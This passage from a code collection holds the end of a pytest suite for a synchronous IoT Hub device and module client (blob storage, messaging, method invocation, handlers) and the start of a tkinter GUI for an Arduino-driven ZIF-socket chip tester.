IoTHubDeviceClientTestsConfig, SharedClientReceiveTwinDesiredPropertiesPatchTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .get_storage_info_for_blob()")
class TestIoTHubDeviceClientGetStorageInfo(WaitsForEventCompletion, IoTHubDeviceClientTestsConfig):
@pytest.mark.it("Begins a 'get_storage_info_for_blob' HTTPPipeline operation")
def test_calls_pipeline_get_storage_info_for_blob(self, mocker, client, http_pipeline):
fake_blob_name = "__fake_blob_name__"
client.get_storage_info_for_blob(fake_blob_name)
assert http_pipeline.get_storage_info_for_blob.call_count == 1
assert http_pipeline.get_storage_info_for_blob.call_args == mocker.call(
fake_blob_name, callback=mocker.ANY
)
@pytest.mark.it(
"Waits for the completion of the 'get_storage_info_for_blob' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
fake_blob_name = "__fake_blob_name__"
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.get_storage_info_for_blob,
kwargs={"storage_info": "__fake_storage_info__"},
)
client_manual_cb.get_storage_info_for_blob(fake_blob_name)
@pytest.mark.it(
"Raises a client error if the `get_storage_info_for_blob` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
fake_blob_name = "__fake_blob_name__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.get_storage_info_for_blob,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.get_storage_info_for_blob(fake_blob_name)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it("Returns a storage_info object upon successful completion")
def test_returns_storage_info(self, mocker, client, http_pipeline):
fake_blob_name = "__fake_blob_name__"
fake_storage_info = "__fake_storage_info__"
received_storage_info = client.get_storage_info_for_blob(fake_blob_name)
assert http_pipeline.get_storage_info_for_blob.call_count == 1
assert http_pipeline.get_storage_info_for_blob.call_args == mocker.call(
fake_blob_name, callback=mocker.ANY
)
assert (
received_storage_info is fake_storage_info
) # Note: the return value this is checkign for is defined in client_fixtures.py
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .notify_blob_upload_status()")
class TestIoTHubDeviceClientNotifyBlobUploadStatus(
WaitsForEventCompletion, IoTHubDeviceClientTestsConfig
):
@pytest.mark.it("Begins a 'notify_blob_upload_status' HTTPPipeline operation")
def test_calls_pipeline_notify_blob_upload_status(self, client, http_pipeline):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
client.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
kwargs = http_pipeline.notify_blob_upload_status.call_args[1]
assert http_pipeline.notify_blob_upload_status.call_count == 1
assert kwargs["correlation_id"] is correlation_id
assert kwargs["is_success"] is is_success
assert kwargs["status_code"] is status_code
assert kwargs["status_description"] is status_description
@pytest.mark.it(
"Waits for the completion of the 'notify_blob_upload_status' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
self.add_event_completion_checks(
mocker=mocker, pipeline_function=http_pipeline_manual_cb.notify_blob_upload_status
)
client_manual_cb.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
@pytest.mark.it(
"Raises a client error if the `notify_blob_upload_status` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.notify_blob_upload_status,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .on_message_received")
class TestIoTHubDeviceClientPROPERTYOnMessageReceivedHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_message_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.C2D_MSG
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .on_method_request_received")
class TestIoTHubDeviceClientPROPERTYOnMethodRequestReceivedHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_method_request_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.METHODS
@pytest.mark.describe(
"IoTHubDeviceClient (Synchronous) - PROPERTY .on_twin_desired_properties_patch_received"
)
class TestIoTHubDeviceClientPROPERTYOnTwinDesiredPropertiesPatchReceivedHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_twin_desired_properties_patch_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.TWIN_PATCHES
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .connected")
class TestIoTHubDeviceClientPROPERTYConnected(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYConnectedTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - OCCURANCE: Connect")
class TestIoTHubDeviceClientOCCURANCEConnect(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientOCCURANCEConnectTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - OCCURANCE: Disconnect")
class TestIoTHubDeviceClientOCCURANCEDisconnect(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientOCCURANCEDisconnectTests
):
pass
################
# MODULE TESTS #
################
class IoTHubModuleClientTestsConfig(object):
@pytest.fixture
def client_class(self):
return IoTHubModuleClient
@pytest.fixture
def client(self, mqtt_pipeline, http_pipeline):
"""This client automatically resolves callbacks sent to the pipeline.
It should be used for the majority of tests.
"""
return IoTHubModuleClient(mqtt_pipeline, http_pipeline)
@pytest.fixture
def client_manual_cb(self, mqtt_pipeline_manual_cb, http_pipeline_manual_cb):
"""This client requires manual triggering of the callbacks sent to the pipeline.
It should only be used for tests where manual control fo a callback is required.
"""
return IoTHubModuleClient(mqtt_pipeline_manual_cb, http_pipeline_manual_cb)
@pytest.fixture
def connection_string(self, module_connection_string):
"""This fixture is parametrized to provie all valid device connection strings.
See client_fixtures.py
"""
return module_connection_string
@pytest.fixture
def sas_token_string(self, module_sas_token_string):
return module_sas_token_string
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - Instantiation")
class TestIoTHubModuleClientInstantiation(
IoTHubModuleClientTestsConfig, SharedIoTHubClientInstantiationTests
):
@pytest.mark.it("Sets on_input_message_received handler in the MQTTPipeline")
def test_sets_on_input_message_received_handler_in_pipeline(
self, client_class, mqtt_pipeline, http_pipeline
):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._mqtt_pipeline.on_input_message_received is not None
assert (
client._mqtt_pipeline.on_input_message_received
== client._inbox_manager.route_input_message
)
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .create_from_connection_string()")
class TestIoTHubModuleClientCreateFromConnectionString(
IoTHubModuleClientTestsConfig, SharedIoTHubClientCreateFromConnectionStringTests
):
pass
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - .create_from_edge_environment() -- Edge Container Environment"
)
class TestIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnv(
IoTHubModuleClientTestsConfig,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnvTests,
):
pass
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - .create_from_edge_environment() -- Edge Local Debug Environment"
)
class TestIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnv(
IoTHubModuleClientTestsConfig,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnvTests,
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .create_from_x509_certificate()")
class TestIoTHubModuleClientCreateFromX509Certificate(
IoTHubModuleClientTestsConfig, SharedIoTHubModuleClientCreateFromX509CertificateTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .connect()")
class TestIoTHubModuleClientConnect(IoTHubModuleClientTestsConfig, SharedClientConnectTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .disconnect()")
class TestIoTHubModuleClientDisconnect(IoTHubModuleClientTestsConfig, SharedClientDisconnectTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_message()")
class TestIoTHubNModuleClientSendD2CMessage(
IoTHubModuleClientTestsConfig, SharedClientSendD2CMessageTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_message_to_output()")
class TestIoTHubModuleClientSendToOutput(IoTHubModuleClientTestsConfig, WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_output_message' pipeline operation")
def test_calls_pipeline_send_message_to_output(self, client, mqtt_pipeline, message):
output_name = "some_output"
client.send_message_to_output(message, output_name)
assert mqtt_pipeline.send_output_message.call_count == 1
assert mqtt_pipeline.send_output_message.call_args[0][0] is message
assert message.output_name == output_name
@pytest.mark.it(
"Waits for the completion of the 'send_output_message' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, message
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.send_output_message
)
output_name = "some_output"
client_manual_cb.send_message_to_output(message, output_name)
@pytest.mark.it(
"Raises a client error if the `send_out_event` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
message,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.send_output_message,
kwargs={"error": my_pipeline_error},
)
output_name = "some_output"
with pytest.raises(client_error) as e_info:
client_manual_cb.send_message_to_output(message, output_name)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Wraps 'message' input parameter in Message object if it is not a Message object"
)
@pytest.mark.parametrize(
"message_input",
[
pytest.param("message", id="String input"),
pytest.param(222, id="Integer input"),
pytest.param(object(), id="Object input"),
pytest.param(None, id="None input"),
pytest.param([1, "str"], id="List input"),
pytest.param({"a": 2}, id="Dictionary input"),
],
)
def test_send_message_to_output_calls_pipeline_wraps_data_in_message(
self, client, mqtt_pipeline, message_input
):
output_name = "some_output"
client.send_message_to_output(message_input, output_name)
assert mqtt_pipeline.send_output_message.call_count == 1
sent_message = mqtt_pipeline.send_output_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == message_input
@pytest.mark.it("Raises error when message data size is greater than 256 KB")
def test_raises_error_when_message_to_output_data_greater_than_256(self, client, mqtt_pipeline):
output_name = "some_output"
data_input = "serpensortia" * 256000
message = Message(data_input)
with pytest.raises(ValueError) as e_info:
client.send_message_to_output(message, output_name)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_output_message.call_count == 0
@pytest.mark.it("Raises error when message size is greater than 256 KB")
def test_raises_error_when_message_to_output_size_greater_than_256(self, client, mqtt_pipeline):
output_name = "some_output"
data_input = "serpensortia"
message = Message(data_input)
message.custom_properties["spell"] = data_input * 256000
with pytest.raises(ValueError) as e_info:
client.send_message_to_output(message, output_name)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_output_message.call_count == 0
@pytest.mark.it("Does not raises error when message data size is equal to 256 KB")
def test_raises_error_when_message_to_output_data_equal_to_256(self, client, mqtt_pipeline):
output_name = "some_output"
data_input = "a" * 262095
message = Message(data_input)
# This check was put as message class may undergo the default content type encoding change
# and the above calculation will change.
# Had to do greater than check for python 2. Ideally should be not equal check
if message.get_size() > device_constant.TELEMETRY_MESSAGE_SIZE_LIMIT:
assert False
client.send_message_to_output(message, output_name)
assert mqtt_pipeline.send_output_message.call_count == 1
sent_message = mqtt_pipeline.send_output_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == data_input
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_message_on_input()")
class TestIoTHubModuleClientReceiveInputMessage(IoTHubModuleClientTestsConfig):
@pytest.mark.it("Implicitly enables input messaging feature if not already enabled")
def test_enables_input_messaging_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline
):
mocker.patch.object(
SyncClientInbox, "get"
) # patch this receive_message_on_input won't block
input_name = "some_input"
# Verify Input Messaging enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
False
) # Input Messages will appear disabled
client.receive_message_on_input(input_name)
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.INPUT_MSG
mqtt_pipeline.enable_feature.reset_mock()
# Verify Input Messaging not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
True
) # Input Messages will appear enabled
client.receive_message_on_input(input_name)
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a message from the input inbox, if available")
def test_returns_message_from_input_inbox(self, mocker, client, message):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = message
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
received_message = client.receive_message_on_input(input_name)
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(input_name)
assert inbox_mock.get.call_count == 1
assert received_message is message
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
client.receive_message_on_input(input_name, block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
client.receive_message_on_input(input_name)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a message is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, message):
input_name = "some_input"
input_inbox = client._inbox_manager.get_input_message_inbox(input_name)
assert input_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
input_inbox._put(message)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_message = client.receive_message_on_input(input_name, block=True)
assert received_message is message
# This proves that the blocking happens because 'received_message' can't be
# 'message' until after a 10 millisecond delay on the insert. But because the
# 'received_message' IS 'message', it means that client.receive_message_on_input
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
input_name = "some_input"
result = client.receive_message_on_input(input_name, block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
input_name = "some_input"
result = client.receive_message_on_input(input_name, block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_message_on_input(input_name="some_input", block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
client._receive_type = RECEIVE_TYPE_API
client.receive_message_on_input(input_name="some_input", block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(self, mocker, client, mqtt_pipeline, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_message_on_input(input_name="some_input", block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_method_request()")
class TestIoTHubModuleClientReceiveMethodRequest(
IoTHubModuleClientTestsConfig, SharedClientReceiveMethodRequestTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_method_response()")
class TestIoTHubModuleClientSendMethodResponse(
IoTHubModuleClientTestsConfig, SharedClientSendMethodResponseTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .get_twin()")
class TestIoTHubModuleClientGetTwin(IoTHubModuleClientTestsConfig, SharedClientGetTwinTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .patch_twin_reported_properties()")
class TestIoTHubModuleClientPatchTwinReportedProperties(
IoTHubModuleClientTestsConfig, SharedClientPatchTwinReportedPropertiesTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_twin_desired_properties_patch()")
class TestIoTHubModuleClientReceiveTwinDesiredPropertiesPatch(
IoTHubModuleClientTestsConfig, SharedClientReceiveTwinDesiredPropertiesPatchTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .invoke_method()")
class TestIoTHubModuleClientInvokeMethod(WaitsForEventCompletion, IoTHubModuleClientTestsConfig):
@pytest.mark.it("Begins a 'invoke_method' HTTPPipeline operation where the target is a device")
def test_calls_pipeline_invoke_method_for_device(self, client, http_pipeline):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
client.invoke_method(method_params, device_id)
assert http_pipeline.invoke_method.call_count == 1
assert http_pipeline.invoke_method.call_args[0][0] is device_id
assert http_pipeline.invoke_method.call_args[0][1] is method_params
@pytest.mark.it("Begins a 'invoke_method' HTTPPipeline operation where the target is a module")
def test_calls_pipeline_invoke_method_for_module(self, client, http_pipeline):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
client.invoke_method(method_params, device_id, module_id=module_id)
assert http_pipeline.invoke_method.call_count == 1
assert http_pipeline.invoke_method.call_args[0][0] is device_id
assert http_pipeline.invoke_method.call_args[0][1] is method_params
assert http_pipeline.invoke_method.call_args[1]["module_id"] is module_id
@pytest.mark.it(
"Waits for the completion of the 'invoke_method' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.invoke_method,
kwargs={"invoke_method_response": "__fake_invoke_method_response__"},
)
client_manual_cb.invoke_method(method_params, device_id, module_id=module_id)
@pytest.mark.it(
"Raises a client error if the `invoke_method` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.invoke_method,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.invoke_method(method_params, device_id, module_id=module_id)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - PROPERTY .on_message_received")
class TestIoTHubModuleClientPROPERTYOnMessageReceivedHandler(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_message_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.INPUT_MSG
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - PROPERTY .on_method_request_received")
class TestIoTHubModuleClientPROPERTYOnMethodRequestReceivedHandler(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_method_request_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.METHODS
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - PROPERTY .on_twin_desired_properties_patch_received"
)
class TestIoTHubModuleClientPROPERTYOnTwinDesiredPropertiesPatchReceivedHandler(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_twin_desired_properties_patch_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.TWIN_PATCHES
@pytest.mark.describe("IoTHubModule (Synchronous) - PROPERTY .connected")
class TestIoTHubModuleClientPROPERTYConnected(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYConnectedTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - OCCURANCE: Connect")
class TestIoTHubModuleClientOCCURANCEConnect(
IoTHubModuleClientTestsConfig, SharedIoTHubClientOCCURANCEConnectTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - OCCURANCE: Disconnect")
class TestIoTHubModuleClientOCCURANCEDisconnect(
IoTHubModuleClientTestsConfig, SharedIoTHubClientOCCURANCEDisconnectTests
):
pass
|
gui.py
|
import tkinter as tk
from tkinter import *
import tkinter.ttk as ttk
from tkinter.ttk import *
from tkinter.messagebox import showerror
import serial
import threading
import time
import queue
import os
if os.name == 'nt': # sys.platform == 'win32':
from serial.tools.list_ports_windows import comports
elif os.name == 'posix':
from serial.tools.list_ports_posix import comports
# ~ elif os.name == 'java':
else:
raise ImportError("Sorry: no implementation for your platform ('{}') available".format(os.name))
def quit(event):
print("Double Click, so let's stop")
import sys;
sys.exit()
class TextScrollCombo(ttk.Frame):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# ensure a consistent GUI size
# implement stretchability
self.grid_rowconfigure(0, weight=1)
self.grid_columnconfigure(0, weight=1)
# create a Text widget
self.txt = tk.Text(self)
self.txt.grid(row=0, column=0, sticky="nsew", padx=2, pady=2)
# create a Scrollbar and associate it with txt
scrollb = ttk.Scrollbar(self, command=self.txt.yview)
scrollb.grid(row=0, column=1, sticky='nsew')
self.txt['yscrollcommand'] = scrollb.set
class CreateToolTip(object):
'''
create a tooltip for a given widget
'''
def __init__(self, widget, text='widget info'):
self.widget = widget
self.text = text
self.widget.bind("<Enter>", self.enter)
self.widget.bind("<Leave>", self.close)
def enter(self, event=None):
x = y = 0
x, y, cx, cy = self.widget.bbox("insert")
x += self.widget.winfo_rootx() + 25
y += self.widget.winfo_rooty() + 20
# creates a toplevel window
self.tw = tk.Toplevel(self.widget)
# Leaves only the label and removes the app window
self.tw.wm_overrideredirect(True)
self.tw.wm_geometry("+%d+%d" % (x, y))
label = tk.Label(self.tw, text=self.text, justify='left',
background='yellow', relief='solid', borderwidth=1,
font=("courier", "9", "normal"))
label.pack(ipadx=1)
def close(self, event=None):
if self.tw:
self.tw.destroy()
class Zif(Frame):
USE_v1_HACK = True
socketWidth = 200
pins = 24
rows = pins / 2
pitchVert = 40
marginSide = 20
marginTop = 100
marginBot = 50
labelSize = 30
pinHeight = 25
pinWidth = 50
height = marginTop + marginBot + (pitchVert * (rows - 1))
width = socketWidth + 50
selectorSize = 100 # width fine tuned to only show first letter of selection when collapsed
selectorHeight = 25
patternWidth = socketWidth
patternHeight = 30
testButtonSize = 30
zifPosX = 150
zifPosY = 80
if USE_v1_HACK:
pinCountOptions = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22]
else:
pinCountOptions = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24]
surfaceCol = "#EEE"
def __init__(self, parent, *args, **kwargs):
self.pinNumLabels = {}
self.pinLabels = {}
self.pinControls = {}
self.pinCodes = {}
self.testPattern = StringVar()
self.autoTest = BooleanVar()
self.autoTest.set(True)
self.portSelectorWidget = None
self.ports = []
self.lastPorts = []
self.portSelectorPrompt = "choose port"
self.rebuildPortSelector = None
self.comPortVar = StringVar()
self.arduinoInputQueue = queue.Queue()
tk.Frame.__init__(self, parent)
self.initUI()
self.startResponseThread()
def initUI(self):
spaceUnderZif = self.zifPosY + 50
self.config(height=Zif.height + spaceUnderZif, width=Zif.width * 2, background="white", borderwidth=0,
highlightthickness=0)
canvasTop = Canvas(self, height=Zif.height + spaceUnderZif, width=Zif.width * 2, background="white",
borderwidth=1,
highlightthickness=0)
canvasTop.pack(side=LEFT, padx=10, pady=20)
canvasTop.create_rectangle(Zif.zifPosX + 2, Zif.zifPosY + 55, Zif.zifPosX + Zif.socketWidth,
Zif.zifPosY + Zif.height, width=1, outline="black", fill=Zif.surfaceCol);
canvasTop.create_rectangle(Zif.zifPosX + 20, Zif.zifPosY + 20, Zif.zifPosX + 40, Zif.zifPosY + 80, width=1,
outline="black", fill="#F7F7F7");
canvasTop.create_rectangle(Zif.zifPosX + 18, Zif.zifPosY + 5, Zif.zifPosX + 42, Zif.zifPosY + 30, width=1,
outline="black", fill="#EEE");
self.portSelector(canvasTop)
self.pinCountSelector(canvasTop)
self.patternField(canvasTop)
self.testButton(canvasTop)
self.autoCheckbox(canvasTop)
self.macros(canvasTop)
for pin in range(0, self.pins):
self.pinNumLabel(canvasTop, x=self.labelPosH(pin), y=self.pinPosV(pin), text=str(pin + 1),
width=Zif.labelSize, height=Zif.labelSize, pin=pin)
self.pin(canvasTop, x=self.pinPosH(pin), y=self.pinPosV(pin),
width=Zif.pinWidth, height=Zif.pinHeight, pin=pin)
# render as buttons or drop down?
buttons=False
if buttons:
self.optionButtons(canvasTop, x=self.selectorPosH(pin), y=self.pinPosV(pin), pin=pin)
else:
self.optionMenu(canvasTop, x=self.selectorPosH(pin), y=self.pinPosV(pin), pin=pin)
# right hand log pane
self.comms = TextScrollCombo(self, height=30, width=40)
self.comms.txt.insert(tk.END, "Serial Log File:\n")
self.comms.pack(fill=BOTH, expand=1)
#
canvasTop.pack(anchor="nw")
self.pack(fill=BOTH, expand=1)
self.repaintPattern()
def startResponseThread(self):
# thread to read and print data from arduino
sinput_thread = threading.Thread(target=self.serialLoop)
sinput_thread.setDaemon(True)
sinput_thread.start()
def writeLog(self, txt):
self.comms.txt.insert(tk.END, txt)
self.comms.txt.see("end")
